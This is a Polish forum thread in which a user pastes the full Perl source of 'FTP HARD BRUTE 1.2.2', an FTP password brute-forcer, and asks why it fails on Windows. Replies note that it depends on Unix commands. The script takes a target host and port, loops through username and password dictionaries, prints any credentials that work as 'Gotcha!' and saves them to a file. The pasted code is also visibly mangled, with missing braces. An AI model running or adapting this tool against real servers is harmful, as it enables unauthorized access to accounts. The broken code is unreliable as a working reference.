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Temat: "Nie można odnaleść ścieżki" - Brutus

  1. #1

    Domyślnie "Nie można odnaleść ścieżki" - Brutus

    Gdy probuje skompilowac brutusa (fhb-1.2.2) w perlu pod windowsem dostaje po uruchomienu cos takiego:

    System nie moze odnalesc okreslonej sciezki.
     o] FTP HARD BRUTE [o
    #!/usr/bin/perl -w 
    # ----------------------------------------------------------------------------
    use Net::FTP;
    use Net::Ping;
    use Text::Tabs;
    #@list = ();
    @users = ();
    @passes = ();
    @save = ();
    #@simple_log = ();
    $clear = '/usr/bin/clear'; 
    $echo = '/bin/echo'; 
    # echo-command
    $p     = Net::Ping->new('icmp'); 
    # for icmp ping-method
    $screen = "  o] FTP HARD BRUTE 1.2.2 [o\n"; 
    # the title
    $user_list = 'users'; 
    # path of the User-dictionary: name must be "users"
    $pass_list = 'pass';  
    # path of the Password-dictionary: name must be "pass"
    $SIG{INT} = 'abort'; 
    # abortfunction
    $tabstop = 8; 
    # tabulatorstop
    # the subfunctions i use...
    sub CLR { open (CLEAR, "|$clear"); 
    # to CLEAR the screen
              close (CLEAR);
    sub ECO { open (ECHO, "|$echo FHB-STATUS: $user - $pass > /dev/tty8");
              close (ECHO);
    sub DOWN { print " \n";
               print "  $host seems to be down!\n";
               print " \n" x 2;
    sub PING { if ($p->ping("$host",1)) 
    # the ping function. The digit after the host is the timeout. Set it like you want
                 { print " \n" x 2;
                   print "  $host is alive!\n";
                   print " \n" x 2;
                else { &DOWN; };           
    sub abort { print STDERR " \n\n  Aborting...shutting down!\n";
                print STDERR "  Creating simple Log in homedirectory...\n\n";
                chdir ();
                $abort_time = scalar localtime;
                open (SIMPLE_LOG, ">>FHB-ABORT-LOG-$abort_time");
                print SIMPLE_LOG "+-=-=-=-=-=- -  -   -\n";
                print SIMPLE_LOG "= FHB aborted on $abort_time while checking $host:\n\n";
                print SIMPLE_LOG "@save";
                print SIMPLE_LOG "\n\n= These are the results done by FHB till abort!\n";
                print SIMPLE_LOG "+-=-=-=-=-=- -  -   -\n";
    sub FIRST_INPUT { 
               print $screen;
               print " \n";
               print "  Host: ";
               $host = <STDIN>;
               chomp $host;
               print "  Port: ";
               $port = <STDIN>;
               chomp $port;
               if(defined($ARGV[0])){if($ARGV[0] eq "-p"){print "\n  Skipping ping...\n"}
                                                          else{print "\n  Please read the README...\n\n";
    sub SECOND_INPUT {
                print " \n";
                print "  Do you know any valid Login-name? [y|n]\n";
                print "  --> ";
                $answer_user = <STDIN>;
                chomp $answer_user;
                                       if ( $answer_user eq "y") 
                                       print " \n";
                                       print "  Login-name: ";
                                       $valid_user = <STDIN>;
                                       chomp $valid_user;
                                       push @users, "$valid_user";
                                       print " \n";
                                       print "  Just run this User ( $valid_user )? [y|n]\n";
                                       print "  --> ";
                                       $user_single = <STDIN>;
                                       chomp $user_single;
                                        if ($user_single eq "y")
                                           {  print " \n";
                                              print "  Just using $valid_user !\n"; 
                                              print "  Script running...this may take a while...\n";
                                              print " \n";}
                                        elsif ($user_single eq "n") {
                                        print " \n";
                                        print "  Using $valid_user first, then User-List !\n";
                                        print "  Script running...this may take a while...\n";
                                        print " \n";}  
                                        else {&SECOND_INPUT;}  
                                       elsif ( $answer_user eq "n")
                                             { print " \n";  
                                               print "  Using User-List !\n";
                                               print "  Script running...this may take a while...\n";
                                               print " \n";
                                       else {&SECOND_INPUT;}
    # the username ask function
    # the main-script
    # --------------------------------------------------------------------------------------   
              open (PASS, "$pass_list") || die "  Man...where is the pass-list ?\n\n";
              open (USER, "$user_list") || die "  Man...where is the users-list ?\n\n";
                   while ($line1 = <PASS>)
                        { ($pass) = split(" ",$line1);
                          push @passes, "$pass";
                   while ($line2 = <USER>)
                        { ($user) = split(" ",$line2);
                          push @users, "$user"
    # kickin the Lists in the Filehandles
    #print @users; 
    #This was for test man !
    #print @passes; 
    #print $user;
    #print $pass;
     foreach $user (@users){
    # if ($valid_user eq $user) { next; }     
           foreach $pass (@passes)
              {$ftp=Net::FTP->new("$host", Port=>"$port") || die "  There is no FTP-Server running on this port!\n\n";
                if ($ftp->login("$user","$pass")) 
                  {print "  Gotcha! ", scalar localtime,"\n";
                   print "  --------------------------------\n";
                   print " \n";
                   print "  $host is open at:\n";
                   print "  LOGIN: $user\n";
                   print "  PASS: $pass\n";
                   $time = scalar localtime;
                   print " \n";
                   chomp $user;
                   chomp $pass;
                   chomp $time;
                   push @save, "$user\t$pass\t$time\n";
                   if ($user_single eq "y") {&SAVEASK}
    # checking for correctness
    $ftp->close; }};
    sub SAVEASK {
    print "  Save results to file ? [y|n]\n";
    print "  --> ";
    $save_answer = <STDIN>;
    chomp $save_answer;   
       if ( $save_answer eq "y") { print " \n"; 
                                   print "  Path to save: ";
                                   $save_path = <STDIN>;
                                   chomp $save_path;
                                   open (XFILE, ">>$save_path") || die "  Can't create SAVEPATH!\n";
                                   print XFILE "\n";
                                   print XFILE "-=-=-=-=- - -  -   -\n";
                                   print XFILE "$host is open at:\n";
                                   print XFILE " \n";
                                   print XFILE "@save";
                                   print XFILE "-=-=-=-=- - -  -   - \n\n";
                                   print XFILE "DPJ kicks some nasty butt!\n";
    			       print XFILE "chaozkid.ath.cx";
    			       close (XFILE);
                                   print "  File saved!\n";
    			       print " \n\n";
                                   print "  DPJ kicks damn ass!\n\n";       
        elsif ( $save_answer eq "n") { print " \n\n";
                                       print "  Finished without saving!\n\n";
                                       print "  DPJ kicks damn ass!\n\n";          
        else { &SAVEASK; };
    # exit(0);

  2. #2
    Jun 2006


    A przepraszam ze zapytam ale pod czym to odpalasz? Windows/*NIX?
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #3


    Uzywam windowsa.

  4. #4
    Jun 2006


    To zobacz sobie panie kolego pod czym ten skrypt dziala - jakie polecenia wykonuje (systemowe) i pod jakim systemem wystepuje on w filmikach - nawet tych ktore sa tutaj na forum... Wtedy odpowiedz bedzie oczywista 'jak w morde strzelil'
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

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